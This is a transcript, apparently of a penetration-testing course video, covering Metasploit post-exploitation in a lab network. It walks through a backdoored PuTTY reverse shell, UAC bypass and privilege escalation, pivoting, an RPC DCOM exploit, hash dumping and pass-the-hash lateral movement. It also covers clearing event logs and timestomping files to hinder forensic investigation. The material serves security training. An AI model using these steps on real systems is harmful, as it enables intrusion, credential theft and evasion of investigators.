Hi. So without further delay, let's continue our lesson to step number 8, post-exploitation. Right. So let's scroll down, and so this is the post-exploitation step where we will use Windows Server. I forgot to mention that we also need to use Windows 10, Windows 7 for the testing. Yeah, that's Windows 7. That will be used to launch the client attack. Okay, so we need Windows 7, and then we also run I believe another Windows server, then web 1. Yeah, so we got then web 1 running Windows 2000. Oh, sorry, it's supposed to be Windows yeah, maybe this, or perhaps we just need 3 Windows. So I will shut down my Windows, the older Windows here. So I'll shut down this. Yeah, so we got Windows, so we got Kali, we got Windows 7, and other Windows Server 2003. Yeah. So what I'm going to do is I'll repeat the previous task, which is related to privilege escalation and also the client-side attack. So client-side attack and privilege escalation. So let's start by launching the MSF Console to prepare ourselves or our machine for the client-side attack. We need to run the MSF Console, and then I will use the multi-handler to create a listener. So use exploit multi-handler, set payload Windows Method reverse TCP, and then oh yeah, I forgot that you can also put the this one the step by step here, like a set let's say Lhost 131.10. Oh, sorry, I'm using 192.168.1.252. Yeah, because my IP currently is this one. Yeah, this is to simulate the connection to the client, and yeah, so this is my, oops, sorry, I need to run this one again. And I run the route. Okay, so this is my network, my subnet, which is supposed to be the same subnet as this. Let me see, IP config. This is actually for my target machine. So I got this. So I should be able to ping, oh sorry, ping 192.168.1.252. Okay. So in this scenario, my Kali is on the same subnet or on the same network as the test Win7 running Windows. Yeah, this is Windows 7. So we can communicate. So let's say Kali is on the same network as Windows 7. You know, all of the workstations or desktops are normally in a single subnet. Yeah. And then the servers will be on different subnet, which is perhaps, let's say in this case, subnet 131.107.1.0/24, right? All right, so we can set this one and then set L port. Could be like 443 just to, you know, evade the firewall, and then exploit. So very simple one, right? Yeah, in fact, you could also create let's say I will create this a text file. We just call it as multi TCP. So we just use the nano multi underscore TCP .rc, which could be just a simple text. So this is how we can actually summarize, or I would say the step-by-step, or put the step-by-step into an RC file or resource file in a text file, or just a simple resource file that will call the the modules one by one. So for example, use exploit multi handler. You can just copy paste on this one if you like, just to avoid error and typing. And you can specify set payload, or you can just copy, of course, copy this one, go back and paste it, and then you can specify also the Lhost. So basically repeat the step-by-step. Okay, and then exploit, right? Press Ctrl X to save, and then press Y, and then press enter. Okay, so instead of running this one by one, all of these commands, I could actually, let me just press Ctrl C here to intercept or interrupt exit. I could also run, since I already have this, I will just show you cat multi. You can see that the multi.tcp.rc underscore multi underscore tcp.rc contains this is just a text file, contains all of the commands for a Metasploit. And to run this script, you just need to run MSF Console -r, then the script name. And that's it. It will automatically run the script, and we will wait. So started reverse TCP handler on this particular IP, right? So our IP on port 443. So it's our Kali is actually waiting for the connection, right? Now, so let's get back to our Windows 7. So provided that I have already created the different type of backdoor, like for example, the previous one we used the financial report. Now I'll be using PuTTY, well, can be anything. I would prefer to use this financial report because it is it can be easily be sent to or through an email to avoid detection, while PuTTY.exe, because this is an executable file, the possibility of being detected is very high. So anyway, just an example, we'll use PuTTY rather than financial report. Just double click, PuTTY will run, and we got a connection, right? Oops, sorry, I forgot to mention that we need to create a specific payload that is connecting to this one. So we need to craft new payload. So let's just run the, let me see, go to tools, and then shelter, and then you go to the shelter backup, copy this one back to the shelter root directory, and then run shelter to recreate the, right click and then run shelter as admin. And then after that, to the properties, set the font so that you can see better. Okay, all right, so this is shelter. We'll minimize this for a while. repeat the task. What's the step? Like A, no, P target party. Yep. We need to make sure that the Lhost is set to 1 and 2 rather than 131 because we are on different subnet, yeah, or different network. Okay, so hang on for a while. Now, while waiting, notice that it is actually started the reverse TCP handler on this particular IP. So we will use this IP on our shelter. Okay, so enable stealth mode, maybe yes, and then L for the listed payload. Select one. So yeah, TCP. Now this is where we change the IP, which is 192.168.1.252, and then the L port still the same, 443. Yeah. And yeah, done. Now we need to copy putty.xe, which is actually just created earlier. Yeah. And then paste to this one, replace it. Now, because putty was already pre-created to have the backdoor that will connect to a specific IP, which is 192.168.1.252, yeah, on our Kali. So let's see if this payload will work. Double click putty, and bingo, we got this one, right? So the problem earlier was actually the IP address that was actually set on putty. So we need to match the IP address of the listening machine. In this case, Kali, right? Now, since we have this one, let's check our privilege level. This is info. Get brief as usual. Yeah. So because we do not have the privilege level, what we can do is, let's see, maybe we can try to, because this is the Windows 7, right? So let's bypass the UAC again by putting this session in the background. Press Ctrl Z, Y, enter, and sessions minus L. We have one session. Now we will need to use the UAC bypass. So back, search UAC. So we'll be using this. Notice that the rank is excellent, meaning that this exploit is very, very good. Copy this and then use this one, and then set the payload as usual. Windows, Multirtcp, reverse TCP. Show the option. Set Lhost, which is 192.168.1.252, and then you can specify the L port. Set L port could be like 444. Yeah, 4444. Yeah, and you can specify the session. Set session, because we'll be utilizing the session number 1. So as we can see here, this is session number 1 that we will be utilizing, and just type exploit. Okay, we got the admin. Yeah, so we got Multirtcp session 2 open. Yeah. Now from here you can check the privilege level by typing get prip. To the system privilege escalation by typing get system, and then now we can check the privilege level again. Just get prip. Now I believe that let's try to type who am I. Oh, there's no command for that. Shell, you can type a shell and then type who am I. And we are anti-system, right? So just go back, and then now what we're going to do is we will check the information on the machine, sysinfo, and type, yeah, so we are in test win7, which is this machine, right? And then now what we are going to do is to check the IP address, IP config, to find the other IP addresses or perhaps the other network that this host is connected. So now we can see that it's connected to this particular network 192.168.1.0/22. Yeah, so because we have this 222, yeah. So this is the subnet, and notice we also found that this PC, this Windows 7 PC, is also connected to subnet 131.107.1.0. Yeah, it has the IP address of 222. Yeah, so it looks like that the routing is there. Let's see. Let's run a specific command called auto. Yeah, we just try to type this auto root. Yeah, -h. Yeah, it says that script deprecated, but it's okay, just leave it like that. And let's see, let's print the routing table by typing run autoroute -p. Routes have not been added yet, so we need to add run autoroute. So because we'll be utilizing this, so let's try. Yeah, so -s or -s 131.107.1.0/24, right? Now print the route. Okay, we got the, so it's actually through session 2, and the subnet is this one. So now what we can do is we can press Control Z, and yep, put it into a background session. As a background session, just type session -L to see all of the sessions. So we got 2 sessions. Yeah, one is with the pen test. This is a normal user, and one with the NT authority, right? Now we can go back and then search for port scanning. So let's just select scan, maybe. Yeah. Let's see, there's a post-exploitation module that will allow you to also scan or to do the port scanning. So let's say, let's see, or maybe just use the command search port scan. Aha, we found this port scan. So auxiliary scanner, port scan sync, or even like yeah, TCP sync port scanner or TCP port scanner. Yeah, so let's try this one. Yeah, copy, use, oops. So press insert, and then show options, set our host. Let's say, we don't actually need the R host. We'll just maybe like port scan on a specific port. The target host could be like CIDR identifier. Yeah, this one. Okay, so set our host 131.107.1.0/24, because we are in this already in this particular subnet. And what else? Let's just run. It's gonna take a while. Yeah. Now, you can also check the step by step by opening the Metasploit Unleash. Yeah. If we go to Metasploit Unleash, you can also look at the step-by-step here under the MSF post-exploitation, and then yeah, the technique I just use is called pivoting. Yeah, so which is actually the technique using, yeah, so here, technique of using an instance, also referred to as a plan or foothold, to be able to move around inside the network. Yeah, so basically using the first compromise to allow an even aid in the compromise of otherwise inaccessible system. Yeah, so you can also use this for to create the or to access a non-routable network. Yeah, so let's see. Yeah, same thing what we did, get system. Yeah, yeah, so it's actually using the auxiliary scanner port scan. So you can also set a port. Yeah, set the thread. Let's try this one. Set our host done, and then we're looking for a specific port 139.445 and set thread 250. So let's try this one. So okay, so let's clear this, and yeah, back. So we'll be using the is it TCP or deal? Yeah, TCP. So just leave it like that. Okay. So again, we can use this port scan slash TCP and show options. Yeah. And then you can specify the R host. We already did the R host. And yeah, we need to specify the port. So for example here, set port 139.445. Yeah, so set port. Is it ports or port? Okay, ports. Yeah, 139.445. And we also need to set threads to 50. Yeah, set threads to 50. Thread. Yeah. Threads. Yeah, okay, so I'll just copy this. Yeah, to make it easier for us. Yeah. Paste this and then run. Yeah, still scanning, 13% complete. Okay, we found 111. This is a good indication. Okay, 52% complete. Okay, next we'll be doing this. Yeah. So I'll be using the pass the hash. Yeah. All right, we found 131.107.1.111, port 445 open. Then we got 222, which is ourself. Oh, yeah. I'm not sure. Yeah, I think this is actually the Windows 7, and then we have the 1.250 and 1.254. Yeah, so let's try to exploit, the first one, which is 111. Yeah. All right, done. So we got this open, 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 and there are other opens. Yeah. So now we have already done with the port scan. To find the main objective of this scanner port scan TCP is to find any hosts within the range, which is 131.107.1.0/24, right? Once we found the target, for example this one, I'll be trying to use I'll be using the other technique. Let's go back and search for PS exec, which is a very nice exploit to do the pass the hash, which is actually the process of passing the or forwarding the hash. Yeah. But if you don't have the hash, how can I get this? Yeah. So what we can do is we can also go back to our previous machine, or maybe do the other attack. Like, for example, maybe like exploit the machine by trying to do the SMB exploit, since we have seen that we found that 445 is open, so we might just run something. So before we do the pass the hash, yeah, let's try to search for an exploit that will target 131.107.111. Search, let's say, MS03. This is my favorite exploit. Yeah, RPC decom exploit. Great. RPC decom. So I will use this one. And I will use this one. Just type info and then insert. It shows about the MSRPC decom interface overflow. And now I'll be using this. So use this one. Oh, sorry. So I need to, sorry, I was just copying this. So I'm using this, and then I need to type the show up this payload, set payload, Windows Multirtcp reverse TCP, and you can set the R host 131.107.1.111 based on our port scan result. Go back to this one. Yeah, remember that our target is this one. So Samba is open. I mean the SMB is open. Yeah. Then we need to set the L host, because we are using Windows Multirtcp reverse. So L host is our machine, which is 192.168.1.111. Sorry, 222, which is our machine. Sorry, 252. Yeah, I was confused. Set L port. You can specify any port like 5555, whatever. Yeah, and exploit. And now we have another Multirtcp open. And from here, we can start dumping the hash by typing hash dump. And we got the admin hash. Yeah, see here. Of course, you can crack this, but one way to do this, I mean, to actually take advantage of this, is actually to do the pass the hash, right? So you just copy this, the hash. Okay. Now let's look at other target. We have like 250 and 254. So let's try 250. Yeah, from here, you press Ctrl Z. Yes. So you can see that we still maintain the session by typing session -L. You can see we have 3 sessions. Yeah. And now from here, you can just go back and search for ps-exec. This is what we're going to use to, to do the hash. Yeah. Copy this, use this one, show options. Now, this is where we can actually put the user as well as the SMB pass. Yeah. So we need to set SMB user. Most common user on server would be on Windows Server would be like administrator. Yeah. Administrator. And set SMB pass. This is where we copy the hash. So you need to copy from this to this. Yeah. So the first hash here is actually the LM, which is the LAN manager, and the second one here is actually the NTLM. So you need to copy the whole hash, copy, and put it here. And we need to specify the host. So we can also specify multiple hosts if you want. You can just type to speed up, just to, for example, so you just set our host. We'll do one by one, 131.107.1.250 and exploit. Wow, it looks like our target is using the same password. Yeah. And the good thing with this ps-exec is that you do not have to crack the password. We just need to use the password. Yeah. Looks like something is not correct. No session was created. Let's see what's actually the problem. Let's try to change the our host to 254, for example, our next target. Show options. So we got L port. Maybe you can change the port, like for example, set L port to, let's say, 6666, just a different port, and exploit. Let's try. Yeah, it looks like it works. So it says that you're binding a loopback address setting to lhost. Okay, let's check our lhost. This is same. Yeah. Maybe we can check. Oh, I forgot. Maybe we need to set lhost to 192.168.1.252 and exploit. Show options. Let's see. We got the lhost, lport, SMB, and then the rhost. Okay, let's try exploit. Looks like it. Yeah, Multirtcp open. We got the fourth Multirtcp open. Okay, so Control Z again to put it to the background, and let's try the next host, which is the one we tested earlier, 22.250, and exploit. If we succeeded, it means that, yeah, we got another Multirtcp session 5. So Control Z, yes, and then from here you can just type sessions -L, and bingo, we got 5 Multirtcp, 2 from the test Win7, 1 from SQL1, then Web1, and also then Web2. Yeah, you can see that we are using different port 444, 555, 666, and 666, right? And I believe that all of these are the correct ones. So we got like then web 1, web 3, and also the this one, right, which is the SQL. All right, so now so we did the pivoting, we did the pass the hash, and from here we can move around from, let's say, one server to another server by interacting with the session. Yeah, like for example, I can just type session. For example, I want to go to then SQL 1, which is session 3. So we just need to put session -I and then 3, and this will bring you to then SQL 1. So we are in session 3. Yeah, so we did the pivoting by using the auto route. And then the second one, we did the pass the hash. We copy the hash and then do the pass the hash using ps-exec. Now we're moving from one server to another server. This is called lateral movement, which allows the attacker to actually move from one server or one machine to another machine, which are normally beyond reach or beyond the network. Okay. So in this case, we can see that we have access to multiple machines. Yeah. So let's try to interact with, let's say, session number 5, just random, and then sysinfo, and bingo, we got then web 3. Control Z again. And we can also move to session number, for example, 4, and then type sysinfo. That's it. We have the access to all machine, SQL 1, then web 3, then web 2. And of course, you can also do hash dump again to find more hashes. Okay. Now we got extra hashes here. Yeah. Okay, you can copy these hashes into a text file and later on, do the cracking as you wish. All right, so that is the those are the what do you call this? The steps, or I would say several activities, several post-exploitation activities that we can actually do. You can also always refer to this, Metasploitable Metasploit Unleashed, that talks about pivoting, privilege escalation, and then also do the ps-exec, pass the hash, yeah, and others, right? Now, for the post-exploitation, you can also do other things, like, for example, if you want to delete the log file, for example. So once you're in, let's say, then web 2, you can delete the entire log file by just typing the clear EV that will delete records from application log, system log, and even security log. And you can do a lot of things here. You can also do something like, changing the date and time of a particular file, yeah, and a lot more things you can actually do, yeah, for the post exploitation. For example, here you can also do a timestomp that will or can be used to avoid the or to hinder the investigation, yeah, the forensic investigation, yeah. So for example, here I could just put something like this. So I'm going to create a file. So for example, here on this particular machine, I'll just type shell, yeah, and then I'll go to the CD and then put the file called, let's say, hacked, echo hacked, and put it into a hacked.txt. And notice that when you type there, you see that hacked.txt was just created. Yeah. Now, the mission is to actually change this into something. I mean, to change the date and time. Yeah. So let's just go back, type exit. Now, since you're here, now what you can do is you can use the just type help, and we have this timestomp. Yeah, just type timestomp. That's H. We need to specify something. So for example, here I'll just copy. So we will change the date and time based on the C Windows System 32 CMD file. Yeah. So let's go back and then paste this one. So because it is Windows 2000, so we need to change with NT to Windows and press enter. Oh, sorry, the name of the file is wrong, so it's hacked. So we need to go to CD. Let me see. So CD pwd. So under Windows, then CD pwd. Okay. Now we try to type ls. So we got this. Yeah, I don't see the. Oh yeah, I saw this one. Yeah. Now I'll rerun the command to change this. So pulling MACE attributes from C Windows System 32. Now let's see. ls. And notice that our hack.txt has the time. Yeah, last modified time is 2013. It used to be, it was actually set to, because this is actually the original date and time. See, it's different, right? So 2019 now is 2003. Yeah, here. So this timestamp can be used to hinder the investigation, forensic investigation. So let's try to clarify. So let's just type there, and again the same one. You have successfully changed this to April 3, 2003. Yeah, following the cmd.exe time and date. All right. So what else we can actually do? Yeah, so this one, yeah, and then also a screen capture, and then yeah, John the Reaper, for example. Yeah, we can also crack the password. Yeah. So for example, earlier we were able to get the password from this one. Yeah, and so on and so forth. Yeah, so something wrong here. Multirtcp session is closed. Maybe because it was actually close. Yeah, anyway, just leave it like that. Yeah, exit. Yeah, we still have other multirtcp. Yeah, sessions minus or -L. We still have 4 multirtcp, so you don't have to worry. Yeah. Yeah. So we can use this. You can crack using the John the Reaper if you want. Yeah. So you can also use this one. Use analyze John the Reaper crack fast. Yeah. Yeah, you can use. You need to first use the post Windows gather hash dump, and then after that crack it using the John the Reaper. All right. So many things. In fact, you can use the cracking and so on and so forth. It will take some time to actually do the cracking, and then we can also do a screen capture and so on and so forth. Yeah. So you can do like a screen capture by typing screenshot. Yeah. All right. So it's gonna take a while. Yeah, anyway, yeah, so this is the screenshot. Yeah, the process of doing the screenshot by typing. Yeah, you can use the migrate, and after that you do the screen capture. So the easiest way is actually to run, for example, let's say interact with session, let's say 3, or you do this, or sessions 3 or sessions dash I space 3, then yeah, let's see, and then type screenshot. This will actually create a screenshot, and then you can copy this, open it with your browser. Okay, yeah, paste this one, and bingo, we got the screenshot. All right, that's about the post exploitation. Yeah, so I hope you enjoyed this post exploitation activities. After you have successfully exploited the system, you can do a lot of things. Yeah, what to do next, it's up to you. Yeah. All right, so see you next time. Bye bye for now.